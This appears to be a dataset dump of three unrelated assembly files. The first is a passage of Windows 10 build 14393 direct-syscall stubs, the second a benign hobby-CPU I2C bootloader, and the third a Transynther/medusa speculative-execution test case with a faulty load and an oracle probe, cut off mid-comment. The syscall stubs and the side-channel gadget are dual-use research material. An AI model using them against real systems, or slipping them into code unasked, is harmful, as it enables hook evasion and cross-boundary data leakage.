; ULONG64 __stdcall NtSetInformationJobObject( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 , ULONG64 arg_04 );
_10_0_14393_sp0_windows_10_rs1_1607_NtSetInformationJobObject PROC STDCALL
mov r10 , rcx
mov eax , 388
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtSetInformationJobObject ENDP
; ULONG64 __stdcall NtSetInformationKey( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 , ULONG64 arg_04 );
_10_0_14393_sp0_windows_10_rs1_1607_NtSetInformationKey PROC STDCALL
mov r10 , rcx
mov eax , 389
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtSetInformationKey ENDP
; ULONG64 __stdcall NtSetInformationResourceManager( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 , ULONG64 arg_04 );
_10_0_14393_sp0_windows_10_rs1_1607_NtSetInformationResourceManager PROC STDCALL
mov r10 , rcx
mov eax , 390
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtSetInformationResourceManager ENDP
; ULONG64 __stdcall NtSetInformationSymbolicLink( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 , ULONG64 arg_04 );
_10_0_14393_sp0_windows_10_rs1_1607_NtSetInformationSymbolicLink PROC STDCALL
mov r10 , rcx
mov eax , 391
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtSetInformationSymbolicLink ENDP
; ULONG64 __stdcall NtSetInformationToken( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 , ULONG64 arg_04 );
_10_0_14393_sp0_windows_10_rs1_1607_NtSetInformationToken PROC STDCALL
mov r10 , rcx
mov eax , 392
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtSetInformationToken ENDP
; ULONG64 __stdcall NtSetInformationTransaction( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 , ULONG64 arg_04 );
_10_0_14393_sp0_windows_10_rs1_1607_NtSetInformationTransaction PROC STDCALL
mov r10 , rcx
mov eax , 393
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtSetInformationTransaction ENDP
; ULONG64 __stdcall NtSetInformationTransactionManager( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 , ULONG64 arg_04 );
_10_0_14393_sp0_windows_10_rs1_1607_NtSetInformationTransactionManager PROC STDCALL
mov r10 , rcx
mov eax , 394
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtSetInformationTransactionManager ENDP
; ULONG64 __stdcall NtSetInformationVirtualMemory( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 , ULONG64 arg_04 , ULONG64 arg_05 , ULONG64 arg_06 );
_10_0_14393_sp0_windows_10_rs1_1607_NtSetInformationVirtualMemory PROC STDCALL
mov r10 , rcx
mov eax , 395
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtSetInformationVirtualMemory ENDP
; ULONG64 __stdcall NtSetInformationWorkerFactory( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 , ULONG64 arg_04 );
_10_0_14393_sp0_windows_10_rs1_1607_NtSetInformationWorkerFactory PROC STDCALL
mov r10 , rcx
mov eax , 396
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtSetInformationWorkerFactory ENDP
; ULONG64 __stdcall NtSetIntervalProfile( ULONG64 arg_01 , ULONG64 arg_02 );
_10_0_14393_sp0_windows_10_rs1_1607_NtSetIntervalProfile PROC STDCALL
mov r10 , rcx
mov eax , 397
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtSetIntervalProfile ENDP
; ULONG64 __stdcall NtSetIoCompletion( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 , ULONG64 arg_04 , ULONG64 arg_05 );
_10_0_14393_sp0_windows_10_rs1_1607_NtSetIoCompletion PROC STDCALL
mov r10 , rcx
mov eax , 398
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtSetIoCompletion ENDP
; ULONG64 __stdcall NtSetIoCompletionEx( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 , ULONG64 arg_04 , ULONG64 arg_05 , ULONG64 arg_06 );
_10_0_14393_sp0_windows_10_rs1_1607_NtSetIoCompletionEx PROC STDCALL
mov r10 , rcx
mov eax , 399
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtSetIoCompletionEx ENDP
; ULONG64 __stdcall NtSetLdtEntries( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 , ULONG64 arg_04 , ULONG64 arg_05 , ULONG64 arg_06 );
_10_0_14393_sp0_windows_10_rs1_1607_NtSetLdtEntries PROC STDCALL
mov r10 , rcx
mov eax , 400
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtSetLdtEntries ENDP
; ULONG64 __stdcall NtSetLowEventPair( ULONG64 arg_01 );
_10_0_14393_sp0_windows_10_rs1_1607_NtSetLowEventPair PROC STDCALL
mov r10 , rcx
mov eax , 401
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtSetLowEventPair ENDP
; ULONG64 __stdcall NtSetLowWaitHighEventPair( ULONG64 arg_01 );
_10_0_14393_sp0_windows_10_rs1_1607_NtSetLowWaitHighEventPair PROC STDCALL
mov r10 , rcx
mov eax , 402
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtSetLowWaitHighEventPair ENDP
; ULONG64 __stdcall NtSetQuotaInformationFile( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 , ULONG64 arg_04 );
_10_0_14393_sp0_windows_10_rs1_1607_NtSetQuotaInformationFile PROC STDCALL
mov r10 , rcx
mov eax , 403
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtSetQuotaInformationFile ENDP
; ULONG64 __stdcall NtSetSecurityObject( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 );
_10_0_14393_sp0_windows_10_rs1_1607_NtSetSecurityObject PROC STDCALL
mov r10 , rcx
mov eax , 404
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtSetSecurityObject ENDP
; ULONG64 __stdcall NtSetSystemEnvironmentValue( ULONG64 arg_01 , ULONG64 arg_02 );
_10_0_14393_sp0_windows_10_rs1_1607_NtSetSystemEnvironmentValue PROC STDCALL
mov r10 , rcx
mov eax , 405
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtSetSystemEnvironmentValue ENDP
; ULONG64 __stdcall NtSetSystemEnvironmentValueEx( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 , ULONG64 arg_04 , ULONG64 arg_05 );
_10_0_14393_sp0_windows_10_rs1_1607_NtSetSystemEnvironmentValueEx PROC STDCALL
mov r10 , rcx
mov eax , 406
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtSetSystemEnvironmentValueEx ENDP
; ULONG64 __stdcall NtSetSystemInformation( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 );
_10_0_14393_sp0_windows_10_rs1_1607_NtSetSystemInformation PROC STDCALL
mov r10 , rcx
mov eax , 407
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtSetSystemInformation ENDP
; ULONG64 __stdcall NtSetSystemPowerState( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 );
_10_0_14393_sp0_windows_10_rs1_1607_NtSetSystemPowerState PROC STDCALL
mov r10 , rcx
mov eax , 408
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtSetSystemPowerState ENDP
; ULONG64 __stdcall NtSetSystemTime( ULONG64 arg_01 , ULONG64 arg_02 );
_10_0_14393_sp0_windows_10_rs1_1607_NtSetSystemTime PROC STDCALL
mov r10 , rcx
mov eax , 409
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtSetSystemTime ENDP
; ULONG64 __stdcall NtSetThreadExecutionState( ULONG64 arg_01 , ULONG64 arg_02 );
_10_0_14393_sp0_windows_10_rs1_1607_NtSetThreadExecutionState PROC STDCALL
mov r10 , rcx
mov eax , 410
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtSetThreadExecutionState ENDP
; ULONG64 __stdcall NtSetTimer2( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 , ULONG64 arg_04 );
_10_0_14393_sp0_windows_10_rs1_1607_NtSetTimer2 PROC STDCALL
mov r10 , rcx
mov eax , 411
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtSetTimer2 ENDP
; ULONG64 __stdcall NtSetTimerEx( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 , ULONG64 arg_04 );
_10_0_14393_sp0_windows_10_rs1_1607_NtSetTimerEx PROC STDCALL
mov r10 , rcx
mov eax , 412
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtSetTimerEx ENDP
; ULONG64 __stdcall NtSetTimerResolution( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 );
_10_0_14393_sp0_windows_10_rs1_1607_NtSetTimerResolution PROC STDCALL
mov r10 , rcx
mov eax , 413
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtSetTimerResolution ENDP
; ULONG64 __stdcall NtSetUuidSeed( ULONG64 arg_01 );
_10_0_14393_sp0_windows_10_rs1_1607_NtSetUuidSeed PROC STDCALL
mov r10 , rcx
mov eax , 414
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtSetUuidSeed ENDP
; ULONG64 __stdcall NtSetVolumeInformationFile( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 , ULONG64 arg_04 , ULONG64 arg_05 );
_10_0_14393_sp0_windows_10_rs1_1607_NtSetVolumeInformationFile PROC STDCALL
mov r10 , rcx
mov eax , 415
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtSetVolumeInformationFile ENDP
; ULONG64 __stdcall NtSetWnfProcessNotificationEvent( ULONG64 arg_01 );
_10_0_14393_sp0_windows_10_rs1_1607_NtSetWnfProcessNotificationEvent PROC STDCALL
mov r10 , rcx
mov eax , 416
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtSetWnfProcessNotificationEvent ENDP
; ULONG64 __stdcall NtShutdownSystem( ULONG64 arg_01 );
_10_0_14393_sp0_windows_10_rs1_1607_NtShutdownSystem PROC STDCALL
mov r10 , rcx
mov eax , 417
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtShutdownSystem ENDP
; ULONG64 __stdcall NtShutdownWorkerFactory( ULONG64 arg_01 , ULONG64 arg_02 );
_10_0_14393_sp0_windows_10_rs1_1607_NtShutdownWorkerFactory PROC STDCALL
mov r10 , rcx
mov eax , 418
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtShutdownWorkerFactory ENDP
; ULONG64 __stdcall NtSignalAndWaitForSingleObject( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 , ULONG64 arg_04 );
_10_0_14393_sp0_windows_10_rs1_1607_NtSignalAndWaitForSingleObject PROC STDCALL
mov r10 , rcx
mov eax , 419
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtSignalAndWaitForSingleObject ENDP
; ULONG64 __stdcall NtSinglePhaseReject( ULONG64 arg_01 , ULONG64 arg_02 );
_10_0_14393_sp0_windows_10_rs1_1607_NtSinglePhaseReject PROC STDCALL
mov r10 , rcx
mov eax , 420
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtSinglePhaseReject ENDP
; ULONG64 __stdcall NtStartProfile( ULONG64 arg_01 );
_10_0_14393_sp0_windows_10_rs1_1607_NtStartProfile PROC STDCALL
mov r10 , rcx
mov eax , 421
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtStartProfile ENDP
; ULONG64 __stdcall NtStopProfile( ULONG64 arg_01 );
_10_0_14393_sp0_windows_10_rs1_1607_NtStopProfile PROC STDCALL
mov r10 , rcx
mov eax , 422
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtStopProfile ENDP
; ULONG64 __stdcall NtSubscribeWnfStateChange( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 , ULONG64 arg_04 );
_10_0_14393_sp0_windows_10_rs1_1607_NtSubscribeWnfStateChange PROC STDCALL
mov r10 , rcx
mov eax , 423
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtSubscribeWnfStateChange ENDP
; ULONG64 __stdcall NtSuspendProcess( ULONG64 arg_01 );
_10_0_14393_sp0_windows_10_rs1_1607_NtSuspendProcess PROC STDCALL
mov r10 , rcx
mov eax , 424
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtSuspendProcess ENDP
; ULONG64 __stdcall NtSuspendThread( ULONG64 arg_01 , ULONG64 arg_02 );
_10_0_14393_sp0_windows_10_rs1_1607_NtSuspendThread PROC STDCALL
mov r10 , rcx
mov eax , 425
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtSuspendThread ENDP
; ULONG64 __stdcall NtSystemDebugControl( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 , ULONG64 arg_04 , ULONG64 arg_05 , ULONG64 arg_06 );
_10_0_14393_sp0_windows_10_rs1_1607_NtSystemDebugControl PROC STDCALL
mov r10 , rcx
mov eax , 426
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtSystemDebugControl ENDP
; ULONG64 __stdcall NtTerminateJobObject( ULONG64 arg_01 , ULONG64 arg_02 );
_10_0_14393_sp0_windows_10_rs1_1607_NtTerminateJobObject PROC STDCALL
mov r10 , rcx
mov eax , 427
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtTerminateJobObject ENDP
; ULONG64 __stdcall NtTestAlert( );
_10_0_14393_sp0_windows_10_rs1_1607_NtTestAlert PROC STDCALL
mov r10 , rcx
mov eax , 428
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtTestAlert ENDP
; ULONG64 __stdcall NtThawRegistry( );
_10_0_14393_sp0_windows_10_rs1_1607_NtThawRegistry PROC STDCALL
mov r10 , rcx
mov eax , 429
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtThawRegistry ENDP
; ULONG64 __stdcall NtThawTransactions( );
_10_0_14393_sp0_windows_10_rs1_1607_NtThawTransactions PROC STDCALL
mov r10 , rcx
mov eax , 430
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtThawTransactions ENDP
; ULONG64 __stdcall NtTraceControl( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 , ULONG64 arg_04 , ULONG64 arg_05 , ULONG64 arg_06 );
_10_0_14393_sp0_windows_10_rs1_1607_NtTraceControl PROC STDCALL
mov r10 , rcx
mov eax , 431
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtTraceControl ENDP
; ULONG64 __stdcall NtTranslateFilePath( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 , ULONG64 arg_04 );
_10_0_14393_sp0_windows_10_rs1_1607_NtTranslateFilePath PROC STDCALL
mov r10 , rcx
mov eax , 432
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtTranslateFilePath ENDP
; ULONG64 __stdcall NtUmsThreadYield( ULONG64 arg_01 );
_10_0_14393_sp0_windows_10_rs1_1607_NtUmsThreadYield PROC STDCALL
mov r10 , rcx
mov eax , 433
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtUmsThreadYield ENDP
; ULONG64 __stdcall NtUnloadDriver( ULONG64 arg_01 );
_10_0_14393_sp0_windows_10_rs1_1607_NtUnloadDriver PROC STDCALL
mov r10 , rcx
mov eax , 434
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtUnloadDriver ENDP
; ULONG64 __stdcall NtUnloadKey( ULONG64 arg_01 );
_10_0_14393_sp0_windows_10_rs1_1607_NtUnloadKey PROC STDCALL
mov r10 , rcx
mov eax , 435
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtUnloadKey ENDP
; ULONG64 __stdcall NtUnloadKey2( ULONG64 arg_01 , ULONG64 arg_02 );
_10_0_14393_sp0_windows_10_rs1_1607_NtUnloadKey2 PROC STDCALL
mov r10 , rcx
mov eax , 436
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtUnloadKey2 ENDP
; ULONG64 __stdcall NtUnloadKeyEx( ULONG64 arg_01 , ULONG64 arg_02 );
_10_0_14393_sp0_windows_10_rs1_1607_NtUnloadKeyEx PROC STDCALL
mov r10 , rcx
mov eax , 437
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtUnloadKeyEx ENDP
; ULONG64 __stdcall NtUnlockFile( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 , ULONG64 arg_04 , ULONG64 arg_05 );
_10_0_14393_sp0_windows_10_rs1_1607_NtUnlockFile PROC STDCALL
mov r10 , rcx
mov eax , 438
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtUnlockFile ENDP
; ULONG64 __stdcall NtUnlockVirtualMemory( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 , ULONG64 arg_04 );
_10_0_14393_sp0_windows_10_rs1_1607_NtUnlockVirtualMemory PROC STDCALL
mov r10 , rcx
mov eax , 439
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtUnlockVirtualMemory ENDP
; ULONG64 __stdcall NtUnmapViewOfSectionEx( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 );
_10_0_14393_sp0_windows_10_rs1_1607_NtUnmapViewOfSectionEx PROC STDCALL
mov r10 , rcx
mov eax , 440
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtUnmapViewOfSectionEx ENDP
; ULONG64 __stdcall NtUnsubscribeWnfStateChange( ULONG64 arg_01 );
_10_0_14393_sp0_windows_10_rs1_1607_NtUnsubscribeWnfStateChange PROC STDCALL
mov r10 , rcx
mov eax , 441
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtUnsubscribeWnfStateChange ENDP
; ULONG64 __stdcall NtUpdateWnfStateData( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 , ULONG64 arg_04 , ULONG64 arg_05 , ULONG64 arg_06 , ULONG64 arg_07 );
_10_0_14393_sp0_windows_10_rs1_1607_NtUpdateWnfStateData PROC STDCALL
mov r10 , rcx
mov eax , 442
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtUpdateWnfStateData ENDP
; ULONG64 __stdcall NtVdmControl( ULONG64 arg_01 , ULONG64 arg_02 );
_10_0_14393_sp0_windows_10_rs1_1607_NtVdmControl PROC STDCALL
mov r10 , rcx
mov eax , 443
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtVdmControl ENDP
; ULONG64 __stdcall NtWaitForAlertByThreadId( ULONG64 arg_01 , ULONG64 arg_02 );
_10_0_14393_sp0_windows_10_rs1_1607_NtWaitForAlertByThreadId PROC STDCALL
mov r10 , rcx
mov eax , 444
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtWaitForAlertByThreadId ENDP
; ULONG64 __stdcall NtWaitForDebugEvent( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 , ULONG64 arg_04 );
_10_0_14393_sp0_windows_10_rs1_1607_NtWaitForDebugEvent PROC STDCALL
mov r10 , rcx
mov eax , 445
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtWaitForDebugEvent ENDP
; ULONG64 __stdcall NtWaitForKeyedEvent( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 , ULONG64 arg_04 );
_10_0_14393_sp0_windows_10_rs1_1607_NtWaitForKeyedEvent PROC STDCALL
mov r10 , rcx
mov eax , 446
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtWaitForKeyedEvent ENDP
; ULONG64 __stdcall NtWaitForWorkViaWorkerFactory( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 , ULONG64 arg_04 , ULONG64 arg_05 );
_10_0_14393_sp0_windows_10_rs1_1607_NtWaitForWorkViaWorkerFactory PROC STDCALL
mov r10 , rcx
mov eax , 447
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtWaitForWorkViaWorkerFactory ENDP
; ULONG64 __stdcall NtWaitHighEventPair( ULONG64 arg_01 );
_10_0_14393_sp0_windows_10_rs1_1607_NtWaitHighEventPair PROC STDCALL
mov r10 , rcx
mov eax , 448
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtWaitHighEventPair ENDP
; ULONG64 __stdcall NtWaitLowEventPair( ULONG64 arg_01 );
_10_0_14393_sp0_windows_10_rs1_1607_NtWaitLowEventPair PROC STDCALL
mov r10 , rcx
mov eax , 449
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtWaitLowEventPair ENDP
|
||||
TheStack | 705c5a04b8f71ca6cd2757f5067789ffecfc801d | Assemblycode:Assembly | {"size": 1612, "ext": "asm", "max_stars_repo_path": "prg/loader.asm", "max_stars_repo_name": "Hato6502/mycom", "max_stars_repo_stars_event_min_datetime": null, "max_stars_repo_stars_event_max_datetime": null, "max_issues_repo_path": "prg/loader.asm", "max_issues_repo_name": "Hato6502/mycom", "max_issues_repo_issues_event_min_datetime": "2021-01-12T07:19:13.000Z", "max_issues_repo_issues_event_max_datetime": "2021-01-12T07:19:13.000Z", "max_forks_repo_path": "prg/loader.asm", "max_forks_repo_name": "hata6502/mycom", "max_forks_repo_forks_event_min_datetime": null, "max_forks_repo_forks_event_max_datetime": null} | {"max_stars_count": null, "max_issues_count": 1, "max_forks_count": null, "avg_line_length": 12.59375, "max_line_length": 28, "alphanum_fraction": 0.6848635236} | #include "init.asm"
#define ins 253
#define cnt_l 254
#define cnt_h 255
main:
read 80;
write i2c_addr;
i2c_wait_0:
read *i2c_stat;
and 4;
branch i2c_wait_0;
i2c_wait_1:
read 0; // High address
write i2c_wdata;
read 1;
write i2c_stat;
i2c_wait_a:
read *i2c_stat;
and 4;
eq 0;
branch i2c_wait_a;
i2c_wait_5:
read *i2c_stat;
and 4;
branch i2c_wait_5;
//read *i2c_stat;
//and 8;
//branch i2c_wait_1;
i2c_wait_2:
read 0; // Low address
write i2c_wdata;
read 1;
write i2c_stat;
i2c_wait_b:
read *i2c_stat;
and 4;
eq 0;
branch i2c_wait_b;
read 0;
write i2c_stat; // STOP
i2c_wait_6:
read *i2c_stat;
and 4;
branch i2c_wait_6;
//read *i2c_stat;
//and 8;
//branch i2c_wait_2;
read 0;
write cnt_l;
read 2048;
write cnt_h;
i2c_read_loop:
read *cnt_h;
eq 3072;
branch i2c_read_loop_break;
i2c_wait_4:
read 3;
write i2c_stat;
i2c_wait_c:
read *i2c_stat;
and 4;
eq 0;
branch i2c_wait_c;
i2c_wait_3:
read *i2c_stat;
and 4;
branch i2c_wait_3;
//read *i2c_stat;
//and 8;
//branch i2c_wait_4;
read *cnt_l;
neq 0;
branch cnt_l_0;
read *i2c_rdata;
write ins;
read 1;
write cnt_l;
goto(cnt_l_switch);
cnt_l_0:
read *cnt_l;
neq 1;
branch cnt_l_1;
read *i2c_rdata;
mul 256;
add *ins;
write ins;
read 2;
write cnt_l;
goto(cnt_l_switch);
cnt_l_1:
read *cnt_l;
neq 2;
branch cnt_l_2;
read *i2c_rdata;
mul 65536;
add *ins;
write ins;
read *ins;
write *cnt_h;
read *cnt_h;
add 1;
write cnt_h;
read 0;
write cnt_l;
goto(cnt_l_switch);
cnt_l_2:
cnt_l_switch:
goto(i2c_read_loop);
i2c_read_loop_break:
goto(2048);
|
||||
TheStack | ada643da08f5e02f733579e9c9cd9f7df0831b8d | Assemblycode:Assembly | {"size": 6726, "ext": "asm", "max_stars_repo_path": "Transynther/x86/_processed/AVXALIGN/_zr_/i9-9900K_12_0xca.log_21829_1359.asm", "max_stars_repo_name": "ljhsiun2/medusa", "max_stars_repo_stars_event_min_datetime": "2020-08-13T19:41:58.000Z", "max_stars_repo_stars_event_max_datetime": "2022-03-30T12:22:51.000Z", "max_issues_repo_path": "Transynther/x86/_processed/AVXALIGN/_zr_/i9-9900K_12_0xca.log_21829_1359.asm", "max_issues_repo_name": "ljhsiun2/medusa", "max_issues_repo_issues_event_min_datetime": "2021-04-29T06:29:35.000Z", "max_issues_repo_issues_event_max_datetime": "2021-05-13T21:02:30.000Z", "max_forks_repo_path": "Transynther/x86/_processed/AVXALIGN/_zr_/i9-9900K_12_0xca.log_21829_1359.asm", "max_forks_repo_name": "ljhsiun2/medusa", "max_forks_repo_forks_event_min_datetime": "2020-07-14T17:07:07.000Z", "max_forks_repo_forks_event_max_datetime": "2022-03-21T01:12:22.000Z"} | {"max_stars_count": 9, "max_issues_count": 1, "max_forks_count": 3, "avg_line_length": 39.1046511628, "max_line_length": 2999, "alphanum_fraction": 0.6577460601} | .global s_prepare_buffers
s_prepare_buffers:
push %r12
push %r14
push %r8
push %r9
push %rbp
push %rcx
push %rdi
push %rsi
lea addresses_WC_ht+0x5fdc, %rsi
lea addresses_UC_ht+0x9d0a, %rdi
sub %r8, %r8
mov $18, %rcx
rep movsl
nop
nop
nop
nop
xor %r9, %r9
lea addresses_D_ht+0x1e97c, %rsi
lea addresses_WC_ht+0x6bec, %rdi
nop
nop
nop
add $6748, %r14
mov $73, %rcx
rep movsq
nop
nop
and $3808, %r9
lea addresses_A_ht+0x1e8bc, %rdi
nop
dec %rbp
movups (%rdi), %xmm5
vpextrq $1, %xmm5, %r8
xor $53586, %rdi
lea addresses_WC_ht+0x193ac, %r8
clflush (%r8)
nop
and %r14, %r14
movb (%r8), %cl
nop
nop
nop
nop
and $19265, %rbp
lea addresses_A_ht+0x1073c, %r8
nop
nop
nop
cmp $56607, %rcx
movw $0x6162, (%r8)
nop
nop
cmp %rdi, %rdi
lea addresses_UC_ht+0xac7c, %rsi
lea addresses_normal_ht+0x16cbc, %rdi
nop
nop
nop
xor %rbp, %rbp
mov $42, %rcx
rep movsb
nop
add $57308, %rcx
lea addresses_WT_ht+0x1b68c, %rcx
cmp %rsi, %rsi
movw $0x6162, (%rcx)
nop
nop
nop
xor $65524, %rbp
lea addresses_normal_ht+0xcf7c, %rbp
clflush (%rbp)
nop
nop
nop
nop
nop
cmp %r8, %r8
movw $0x6162, (%rbp)
nop
nop
nop
nop
cmp $6024, %r8
lea addresses_A_ht+0xbb7c, %rsi
lea addresses_UC_ht+0x7abc, %rdi
nop
nop
nop
sub %r12, %r12
mov $122, %rcx
rep movsw
add %r9, %r9
lea addresses_WT_ht+0x1417c, %rsi
lea addresses_A_ht+0x1bab5, %rdi
nop
nop
xor $24549, %r8
mov $47, %rcx
rep movsq
nop
nop
inc %rdi
lea addresses_WT_ht+0x1e164, %rbp
and %r9, %r9
mov $0x6162636465666768, %r8
movq %r8, %xmm7
vmovups %ymm7, (%rbp)
nop
nop
nop
sub $15178, %rbp
pop %rsi
pop %rdi
pop %rcx
pop %rbp
pop %r9
pop %r8
pop %r14
pop %r12
ret
.global s_faulty_load
s_faulty_load:
push %r12
push %r13
push %r9
push %rbp
push %rcx
// Faulty Load
lea addresses_PSE+0xcb7c, %r12
nop
add $20843, %rcx
movntdqa (%r12), %xmm3
vpextrq $0, %xmm3, %r9
lea oracles, %rcx
and $0xff, %r9
shlq $12, %r9
mov (%rcx,%r9,1), %r9
pop %rcx
pop %rbp
pop %r9
pop %r13
pop %r12
ret
/*
<gen_faulty_load>
[REF]
{'OP': 'LOAD', 'src': {'size': 4, 'NT': False, 'type': 'addresses_PSE', 'same': False, 'AVXalign': False, 'congruent': 0}}
[Faulty Load]
{'OP': 'LOAD', 'src': {'size': 16, 'NT': True, 'type': 'addresses_PSE', 'same': True, 'AVXalign': False, 'congruent': 0}}
<gen_prepare_buffer>
{'OP': 'REPM', 'src': {'same': False, 'type': 'addresses_WC_ht', 'congruent': 5}, 'dst': {'same': False, 'type': 'addresses_UC_ht', 'congruent': 1}}
{'OP': 'REPM', 'src': {'same': False, 'type': 'addresses_D_ht', 'congruent': 8}, 'dst': {'same': True, 'type': 'addresses_WC_ht', 'congruent': 4}}
